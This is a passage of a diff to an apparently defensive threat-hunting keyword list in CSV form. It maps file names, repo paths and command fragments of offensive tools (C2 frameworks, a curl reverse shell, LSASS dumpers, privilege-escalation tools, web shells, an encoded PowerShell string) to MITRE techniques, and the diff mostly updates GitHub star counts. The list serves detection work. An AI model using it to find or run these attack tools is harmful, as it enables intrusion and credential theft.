T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*IPfuscation.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*IPfuscation.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*IPfuscation.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP *","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*iptables -t nat -A REDSOCKS*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" "*IReversePortForwardService.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*irkjanm/krbrelayx*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*irs.exe -*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","77","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" -"*irs.exe exec*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","77","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" -"*irs.exe list*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","77","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" -"*irs.exe list*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","77","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" -"*irsl/curlshell*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","269","28","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" -"*is_kirbi_file*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*irs.exe -*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*irs.exe exec*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*irs.exe list*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*irs.exe list*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*irsl/curlshell*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*is_kirbi_file*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*is_proxy_stub_dll_loaded*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*isShellcodeThread*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" -"*issue_shell_whoami*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*issue_shell_whoami*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*Itay Migdal*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" -"*itm4n/PrintSpoofer*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*itm4n/PrintSpoofer*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*itm4n/PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*itm4nprivesc*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*its-a-feature/Apfell*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*its-a-feature/Mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*its-a-feature/Mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*itm4n/PrintSpoofer*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*itm4n/PrintSpoofer*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*itm4n/PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*itm4nprivesc*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*its-a-feature/Apfell*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*its-a-feature/Mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*its-a-feature/Mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*itsKindred*","offensive_tool_keyword","Github Username","gthub username hosting malware samples and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/itsKindred","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ItsNee/Follina-CVE-2022-30190-POC*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" -"*itunes_backup2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*itunes_backup2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*itwasalladream -u * -p * -d *","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","0","N/A","7","8","738","118","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" "*itwasalladream*bogus.dll*","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","0","N/A","7","8","738","118","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" "*ItWasAllADream-master*","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","7","8","738","118","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" "*IUnknownObj.cpp*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" -"*iwork2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*iwork2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*JAB4ACAAPQAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AUABJAEQAIAAkAHAAaQBkACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAG4AYQBtAGUAOwAgACIAJABwAGkAZAAgACQAeAAuAGUAeABlACIA*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*jackdaw --*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z" "*jackdaw.py*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z" @@ -12506,83 +12662,83 @@ "*jas502n/CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*jatayu.php*","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","31","8","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" "*jatayu-image.png*","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","31","8","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" -"*java -jar BeaconTool.jar*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" -"*java/jndi/LDAPRefServer.java*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","715","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" -"*java-deserialization-exploits*","offensive_tool_keyword","java-deserialization-exploits","A collection of curated Java Deserialization Exploits","T1029 - T1529 - T1569 - T1218","TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Coalfire-Research/java-deserialization-exploits","1","0","N/A","N/A","6","583","263","2021-05-16T23:10:49Z","2016-05-31T16:23:08Z" -"*javascript-obfuscator*","offensive_tool_keyword","javascript-obfuscator","JavaScript Obfuscator is a powerful free obfuscator for JavaScript. containing a variety of features which provide protection for your source code.","T1027","TA0010","N/A","N/A","Defense Evasion","https://github.com/javascript-obfuscator/javascript-obfuscator","1","0","N/A","N/A","10","11761","1384","2023-09-05T17:32:26Z","2016-05-09T08:16:53Z" -"*jboss_jmx_upload_exploit*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*jdk*-activator-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*jdk*-call-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*jdk*-dgc-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*jdk*-method-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*jdk*-reg-bypass.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*java -jar BeaconTool.jar*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 